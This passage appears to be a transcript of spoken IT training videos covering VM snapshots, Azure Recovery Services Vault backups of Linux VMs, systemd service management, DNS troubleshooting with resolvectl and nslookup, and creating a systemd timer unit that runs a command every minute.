a copy of the VM that is separate and independent from this source VM, a clone makes sense. But if you want some what would be considered backup protection, maybe before a major configuration change, or just periodically to be safe, snapshots would be the solution. Bear in mind that snapshots take disk space. And so if you're not careful on a hypervisor host that might run many different virtual machines where you've enabled snapshots, even auto-protect snapshots, you're going to want to make sure that you monitor disk capacity on a regular basis to make sure you aren't running out of disk space. Another thing to consider is that while the VM is running and you take a snapshot, things are still happening in the VM. And you might find it takes a little bit longer than if it were not running. That's not always the case, but it's a consideration where it makes sense, if you can afford to have downtime, that you can also shut down the virtual machine and take a snapshot of it from that state as well. So let's go ahead and do that. I'm not going to power it off. That's a little abrupt. I'm instead going to choose Shutdown Guest to go through the normal shutdown procedure. And now if I go into VM Snapshot, Snapshot Manager, let's just accept the defaults by clicking Take Snapshot, Snapshot 3, Close Out. It's pretty quick. So if I do it again, VM Snapshot, Snapshot Manager, we got Snapshot 3, let's take another snapshot. Nothing has changed. So Snapshot 4, it's very quick. So there's less going on because the VM OS is not running, so it's less for it to think about. The Microsoft Azure cloud has its own methods of backing up cloud-based data, such as backing up virtual machines. Our focus here is going to be backing up and having the ability to understand how to restore Linux-based virtual machines in the Microsoft Azure cloud. First things first, we need to have a recovery services vault. If I go to the All Resources view, here's all my cloud resources within my Azure subscription, but it says currently at the top, type equals all. Well, how about we filter the type of objects here so we're only looking at recovery services vaults, if we even have any. If not, we can create one by clicking the Create button over here in the upper left. But I'm going to click type equals all, and I'm going to scroll down to the R's, and next to recovery services vault, notice we've got a 1 in parentheses. That means that we have one of those types of objects. Otherwise, recovery services vault wouldn't even be in this list. So I'll put the check mark in the box to the left of that, and I'll click Apply. So now we're only viewing Recovery Services Vault. Notice that it's in the East US location. You want to make sure that the resources you want to back up and the Recovery Services Vault are in the same location, East US here. So here it is, it's called Vault 143. In the left-hand navigator, let's go to the Virtual Machines view, because from here, I have a list of virtual machines and, of course, the location or the region. In this case, both of mine are in East US also. From the perspective of the properties of a virtual machine, so I'll just open up the virtual machine. In the left-hand navigator in the VM properties, I can scroll all the way down under operations, and one of the things I'll have is backup. Notice here, it automatically selected the only vault we have in the same region, East US, that's Vault 143. So we could create a new vault if we really wanted to. Certainly we'd have to do that if we didn't already have one that was created. We can also choose the backup policy type. However, I'm going to cancel that because we can also look at that from the perspective of the recovery services vault. So I'll just filter the list here in all resources for vault. There it is, Vault 143. So from within here, I could also choose to go to backup on the left, where the interface is different, of course, because it doesn't know that we want to back up a VM necessarily. So therefore, it says, where is your workload running? The default is Azure. And so down below, I can choose to back up Microsoft Azure virtual machines, file shares, SQL servers, and so on. I can also, from the list at the top, select from a variety of Azure Stack options, which are for on-premises Azure services that look and feel like the actual cloud-based services. That doesn't apply to us. I've also got on-premises, where we could specify that we want to back up file servers, Hyper-V virtual machines, VMware virtual machines, SQL Server, SharePoint, and so on. And this is all on-premises. Now, as you might guess, you're going to have to install a software agent on, for example, your on-premises file server so it knows to talk to this recovery services vault for backup. But that doesn't apply in this case. So I'm going to go back at the top in the list where it says, where's your workload running? I'm going to choose Azure again, and virtual machine is what I want. Down below, I'll click the backup button. It wants us to select the policy. So how often do we want to have a backup of the virtual machine? I'm going to choose an enhanced backup type where we can have multiple backups per day. And I'll leave the enhanced policy selection to its default. So full backup every 4 hours starting at 8 o'clock in the morning for 12 hours. That's 8 o'clock universal time. Retaining recovery snapshots for 7 days and the backup point itself for 30. Down below, we need to specify one or more virtual machines as subjects to be backed up. So I'll click the Add button, and I'm going to put a check mark next to Ubuntu 2, and I'll click OK. Okay, so Ubuntu 2 has been added here. Notice it knows that there are 3 disks in that virtual machine's properties. The OS disk, of course, which you can't deselect, but we could choose to deselect our data disks, if there are any, attached to the VM. So here, of course, there are 2 of them. I want them backed up as well. We can also turn on the check mark. Should we also include future disks that might be added in the future? What a great option. I'm going to leave that on. Okay, I'm going to go ahead and click Enable Backup. Okay, so the deployment is complete. So I can choose to go to resource. Well, all I really want to do here, though, is go back into my Recovery Services Vault. And in the properties of it, I'm not going to go to Backup this time, but under the Protected Items heading in the left-hand navigator, I'll click Backup Items. Notice next to Azure Virtual Machine, the backup item count shows, in this case, 2. Well, that's because I have an old backup from another virtual machine. But notice Ubuntu 2 shows here. It says Backup Pre-check passed, but under the last backup status column, there's a warning icon, like a yield icon, that says Warning, Initial Backup Pending. And we can click the View Details link to the right to get a little bit more details about that. Notice we can also click the Backup Now button up at the top. So I'm going to go ahead and do that. I'll accept the default retention date and click OK. So we could wait for the schedule to kick in, but of course we can perform an on-demand backup at any point in time. Up here in the upper right in my bell or notification icon, if I click on it, it's triggering a backup for Ubuntu 2. Okay, so it triggered the backup. It says monitor the progress in the backup jobs page. I can even actually look at that from the virtual machine's perspective. So you can do it from the vault, from the virtual machine. If I go into that virtual machine and kind of scroll down and select backup in the left-hand navigator, we can click on the link here for the new Microsoft Azure Backup Center, where on the left, we can click Backup Jobs. And notice that for Ubuntu 2, the configuration of the backup has completed, but the actual backup itself, and that will depend on how many disks are attached to the VM, how full they are, it's currently showing us being in progress. So in the future, once the backup is completed, we'll have the option of going into a virtual machine's properties, into backup, and we'll have the option of running restore VM or file recovery. In this demo, we're going to take a look at how to manage Linux services using systemd. Now, you might recall that systemd is just another way that we can manage various types of components of the Linux OS, such as service units or daemons. There are other ways to do this, specifically in Ubuntu Linux. However, we're going to focus on systemd. Now, this can be great for standard management, but also it can help with troubleshooting. Let's start by issuing the systemctl command, list-units, and then --type equals service, and then --state equals active. So which active services does our Linux machine know about? So there's all kinds of stuff here, like the cron service, the keyboard setup service, the rsyslog service, the SSH service, and so on. So these are loaded and active. Now, of course, we also have the option of using our up arrow key to go back to that previous command and changing --state equals active to --state equals failed. You could also use --failed on the command line, but let's go ahead and do this. Enter. All right, so this is telling me then that we've got a problem with the log rotate service. This is important because it's a quick way for us to see where there might be a problem so that we know where to focus our attention from this point forward. So what I might do then is now run the sudo journalctl command, view journalctl log entries, pipe that to grep, looking perhaps for log rotate. We could even pipe that to more to stop after the first screenful. So we could poke through the log entries seeking any issues that pop out at us. Now, also take note, I'll just quit out of that. If we do not pipe that output to more, then log rotate, which is our filter here, with grep will show up highlighted in red. As we can see, there are many logged entries related to log rotate. Other things we can do related to systemd includes basic system or service management, such as systemctl status, let's say Apache 2, assuming the Apache web server is installed. Well, it's showing here as being inactive. So using our up arrow key, we could bring up that command and change the word status to start. Now here I get this message about authentication. What I really should be doing here is prefixing that, of course, with sudo. I'm not logged in as root. And now if I check the status once again, of course, the Apache web server is showing as running. We can also use sudo systemctl to enable a given service like Apache 2, or in fact disable it if you no longer want it running. Now, of course, if you don't want something running, if that's going to be for the longer term, you really should uninstall all of the related components to reduce the attack surface or the potential attack surface. That's just a standard part of hardening any system. You can also use sudo systemctl to terminate troublesome services or daemons, just like you would do it at the kill command level. That's actually what you would pass as the next parameter to systemctl is kill, maybe -s for signal 9, which means kill right away, kind of abruptly, but if it's not responding anyhow, that's the next thing to try, and then specify the service name. In this case, if we check the status of Apache 2, the other things you can do here also include working with things like run levels. If I run sudo systemctl get-default, it'll return the default run level, in this case graphical.target. We could also run sudo systemctl isolate and specify another target like multi-user.target. If I use the run level command, for example, we were previously in run level 5, which was the graphical.target, so the potential to run the GUI if you wish, but we are currently now in run level 3, which is multiple users with network support. So you can use systemctl to also manipulate that. But all we've done here with systemctl isolate is temporarily switched to that run level. We haven't modified the default. So if I run the get default trailing syntax on that, it's still set to graphical.target. You can also run standard things like sudo systemctl reboot or power off. And interestingly enough, of course, you can also force the machine to go into rescue mode. Now, why would you do that? The machine would have to be well enough for you to issue that command in the first place. Well, it depends the level of problems you're having on your machine and how it's running. Sometimes this can be handy to force it to run into that. Or you might use it for training purposes if you have new Linux technicians and you want to get some experience working in rescue mode environments. Also, you can run sudo systemd-analyze space blame. This is important, of course, as we know, because it will list, in this case, the service unit and how long it took to start up. Given that we have a baseline, it's pretty easy for us to determine if this is normal or not. But the fact that you would issue that command would tell us that things are probably not normal. There's probably a performance issue if you're even bothering to do this. That, or you're just curious, or you're establishing a baseline. But regardless of the reason, it's important to have an understanding as a Linux technician for management and for troubleshooting as to how systemd works. Troubleshooting DNS issues comes in many forms. There are plenty of commands that we can use to determine why DNS may or may not be working. DNS, of course, is used most commonly to resolve DNS names, FQDNs, to IP addresses, which is really what most people and apps depend on. Rarely will user, for example, in a web browser interface, type in the IP address of the site they want to go to. That's definitely not the norm. The first thing we would do when troubleshooting DNS issues is do the basics, IP space A. So is the appropriate network interface like Ethernet 0 up and running? Do we have a valid IPv4 or IPv6 address? And also, if I run commands like iproute, do we have a default route configured that will allow us, for example, when needed, to get out of the local area network? You might not always need to do that, even for internal name resolution on one subnet. It really depends on the environment, but it is something very basic worth doing. And part of the troubleshooting methodology is to try the simple stuff first that might actually be the cause of the problem. When it comes to troubleshooting DNS, instead of pinging things by name, you're probably better off running tools like NSLookup, name server lookup, where you could type in things like www.skillsoft.com if you want to be able to query IPv4A records to see if you get a response or not. Here we have a number of non-authoritative answers from other DNS servers. So at this point, we know that it's working. So I'll type exit to get out of NSLookup. Now, the other thing that we should consider is that if we go into /etc/systemd, so the systemd service manager, in here, we could use a text editor, so I'll sudo nano into a file called resolved.conf, the DNS config file. Now, a lot of these are commented out, but we could specify our own settings here. For example, I could remove the hashtag symbol in front of DNS equals, and I could specify various IP addresses for different DNS name resolution servers, and I could specify multiple DNS server IP addresses, each separated by a space. You could also specify DNS domain names that you want specifically queried for DNS servers. I'm going to press Ctrl-X to get out of here, but I will not save my changes. But when you do save your changes, to put them into effect, what you'll normally do then to put it into effect is you'll run sudo systemctl restart, and then specify, in this case, systemd-resolved.service to restart it. Now, if we were to cat /etc/resolve with no e .conf, it'll have the configuration for DNS that we would have configured potentially in the other file we were just looking at, and it writes it here. Notice here it says at the top, this file is managed by systemd resolved do not edit. Now, that wasn't always the case. You might find this is the case in the resolve.conf file on newer distributions, but some older Unix or Linux environments still expect manual configurations for DNS to be in the resolve.conf file. You can also, with the command line, run things like sudo resolvectl and maybe query, and let's say skillsoft.com. So this will be another way to test and verify whether DNS name resolution is working correctly. It just gives us different types of input that we might expect from other DNS tools like NSLookup or even dig. There are times when you want to make sure when you're testing DNS that you don't have negative responses from recent previous DNS queries that have been cached in memory on the Linux host. And so to do that, you can flush the DNS cache from memory on this machine. You can do that with sudo resolvectl flush-caches. After that is when you would start testing your name resolution, such as querying for skillsoft.com. Sometimes, if you catch it at the right moment, and you previously had a negative DNS response, maybe because of an incorrect DNS server entry that you had configured, after flushing the caches, you might then get successful responses. So it's important then as a Linux technician to be aware of the role that systemd plays in modern Linux distributions when it comes to DNS name resolution. Systemd can be used as a replacement for scheduling things like cron jobs. Now, traditionally, cron has been used on Linux and Unix systems, as we know, to schedule things where the trigger is time-based, running it every few minutes, every hour, or certain days of the month. But on modern Linux systems, you'll find that systemd is more and more often being used to schedule things like cleanup tasks on Linux hosts or running of custom shell scripts. You'll find that's being used more and more often than cron jobs are now. But one of the great things about working with systemd timer units is that you have some additional features otherwise not readily available when using cron scheduling. Things like waiting a certain amount of time after an event. Like maybe you have two shell scripts and you want the second shell script to run 20 minutes after the first one completes, however long the first one takes and whatever time that would end up happening to be. We can view some of the default systemd timers by issuing the command sudo systemctl status and then asterisk timer, anything that starts with any text but has timer in it. So these all end, as we see here, with .timer as opposed to .service. Notice there's some file system checking timers, there's a log rotate timer, and notice these are all showing as being active and waiting. Notice the trigger is shown, and the trigger here would be another service, so it ends with .service, another different type of systemd unit. So let's go ahead and create our own custom little timer configuration. I'm going to start by going into the /etc/systemd/system directory. If I do an ls here, we've got a number of systemd service files here and really different types of systemd units like mounts and so on. I'm going to use the nano editor here, so sudo nano, to create a file here called test1.service. The section headers here are declared with an open and closed square bracket, so I'll start with unit, where I'll specify a property within that section, description equals my first systemd timer test. Then further down, I'll add another section called service, which will again be enclosed in square brackets. Property under there will be type, in this case equals one shot, so one configuration. exec start will be the next item on the line, on its own line. Exec start equals slash, and let's say we just want to run usr bin, and we want to run the free command. And then another section here called install in square brackets, wanted by will be the keyword equals, and I want this to be available in the multi-user.target run level 3 in other words. Close out and save that file. If I do an ls of things that start with the word test in this current directory, it returns back test1.service. From here, I can run commands like sudo systemctl status, and in this case, it's called test1.service. All right, there's our little description. My first systemd timer test, loaded but currently inactive. Okay, so not running. Q for quit. So then if I start my little test service, and then if I check the journal CTL log using -S, so since today, -U, I'll specify my test1.service. If I have issued the free command, which I did a few moments ago, then the results of that command will show here. Okay, so the next thing I'm going to do is I'm actually going to configure the timer unit. So I'm already in the /etc/systemd/system directory, so I'm just going to run sudo nano again, but this time I'm going to create a file called test1.timer. Last time we created the service type of unit. This time it's a timer type of unit. So I'll use the unit keyword in square brackets at the top with a description, put in some kind of description after the equal sign. Requires equals. This is where I'm going to put in test1.service. So it requires test1.service. Then I'll put in a timer header section, again enclosed in square brackets because it's a header. The unit equals test1.service. And then this is where the timing comes in on calendar. So it's capital O for on and capital C for calendar. So after the equals, I've got asterisk, dash, asterisk, dash, asterisk. So that takes care of the day of the week. So every day of the week and the year, month, day. But then we have to specify the hours, minutes, and seconds. So we've got a space between that section and then asterisk, that's for hours, colon, asterisk for minutes, colon, 00 for seconds. So what this really means is I want to run this once every minute, for testing purposes only, of course. And then I'll add one more header unit here called install, under which I'll add wanted by equals timers.target. So it's registered as a timer item. So I'll control and save that. Then I'll go back into my test1.service file. And under the unit header at the top, I'll make sure I add wants equals test1.timer. So it's not necessarily required, but it's linked to it in that way. So I'll clear the screen, and I'm going to run sudo systemctl restart, not start. It's already started. We checked that. I want to restart my test1.service unit because I have configured it and made a change. So I'll go ahead and do that. Now, if we run our journal CTL commands since today of our test1.service, but we add a -f, which means we'll be able to see real-time updates. It means follow. What we're going to start noticing is that every 1 minute, it's going to be actually executing the free command. We're already starting to see that happening here. So this is why we say we can use systemd timer units as a way of scheduling things to run in Linux instead of using cron. Now, this is going to be important, for example, from a troubleshooting perspective. If you're expecting to go in and find a scheduled cron job somewhere that's maybe consuming resources when really it might not be that at all. Instead, it might be a systemd timer unit.